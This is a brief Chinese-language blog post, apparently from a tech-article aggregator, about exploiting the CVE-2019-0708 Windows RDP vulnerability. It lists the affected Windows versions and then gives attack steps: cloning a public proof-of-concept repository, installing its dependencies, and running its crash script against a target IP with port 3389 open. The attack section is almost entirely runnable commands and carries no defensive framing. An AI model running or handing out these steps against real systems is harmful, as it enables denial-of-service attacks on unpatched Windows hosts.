V2AS问路
CVE-2019-0708漏洞利用
阅读原文时间:2023年07月14日阅读:2

20190514,微软发布补丁,修复了一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。

影响范围:

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows Server 2003

Windows XP

攻击过程:

git clone https://github.com/wanglf/CVE-2019-0708.git

pip install -r requirements.txt

python crashpoc.py 目标IP

前期是对方必须开启了3389端口

漏洞的分析参考: https://www.freebuf.com/vuls/205380.html

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

云原生生态周报(Cloud Native Weekly)第2期
细数2019-2023年CWE TOP 25 数据,看软件缺陷的防护
带你读论文丨Fuzzing漏洞挖掘详细总结 GreyOne

4

CVE-2022-42475-FortiGate-SSLVPN HeapOverflow 学习记录

5

带你读论文丨S&P21 Survivalism: Living-Off-The-Land 经典离地攻击

6

__wakeup()魔术方法绕过(CVE-2016-7124)

7

Shodan使用指南

8

Webmin 远程命令执行漏洞(CVE-2019-15107)

9

CVE-2019-2618 任意文件上传

10

byteCTF 2019